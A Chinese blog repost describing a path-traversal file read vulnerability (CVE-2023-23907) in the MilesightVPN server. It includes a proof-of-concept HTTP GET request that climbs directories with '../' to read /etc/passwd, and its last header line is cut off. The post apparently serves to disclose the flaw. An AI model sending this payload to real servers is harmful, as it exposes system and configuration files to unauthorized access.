博客
关于我
Milesight VPN server.js 任意文件读取漏洞(CVE-2023-23907)
阅读量:794 次
发布时间:2023-02-09

本文共 540 字,大约阅读时间需要 1 分钟。

MilesightVPN服务器文件读取漏洞分析

MilesightVPN是一款专为Milesight产品设计的VPN通道设置软件,其服务器接口在此次发现的安全漏洞中表现尤为突出。该漏洞使得攻击者能够通过特定的接口操作,读取系统关键文件和数据库配置信息,严重威胁网站的安全性。

该漏洞复现环境如下:

GET /../../../../../../../../../etc/passwd HTTP/1.1

Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-ur

该漏洞的POC(Proof of Concept,漏洞证据)表明,攻击者可以通过简单的GET请求访问系统核心文件,进一步导致服务器安全性全面受损。

经测试,该漏洞在MilesightVPN server.js的接口中存在,具体表现为攻击者可通过该接口读取包括数据库配置文件和系统配置文件在内的重要系统文件。

转载地址:http://tzffk.baihongyu.com/

你可能感兴趣的文章
Memcached对象缓存详解
查看>>
Memcached常用操作
查看>>
memcached的LRU删除机制
查看>>
memcached缓存服务器的安装
查看>>
memcached高速缓存学习笔记001---memcached介绍和安装以及基本使用
查看>>
memcached高速缓存学习笔记002---telnet操作memcached
查看>>
memcached高速缓存学习笔记003---利用JAVA程序操作memcached crud操作
查看>>
Memcached:Node.js 高性能缓存解决方案
查看>>
memcache、redis原理对比
查看>>
memcache与memcached的区别
查看>>
MemCache在win7上的可视化配置以及Nodejs/Net应用
查看>>
memcache实现php会话保持
查看>>
memcache缓存命中率分析
查看>>
memcache编译安装(cygwin环境)
查看>>
Memory Consistency Erros
查看>>
memory management before arc
查看>>
Memos-desktop:基于Electron框架的跨平台记事本应用
查看>>
memset,memcpy报错
查看>>
memset函数
查看>>
memset初始化高维数组为-1/0
查看>>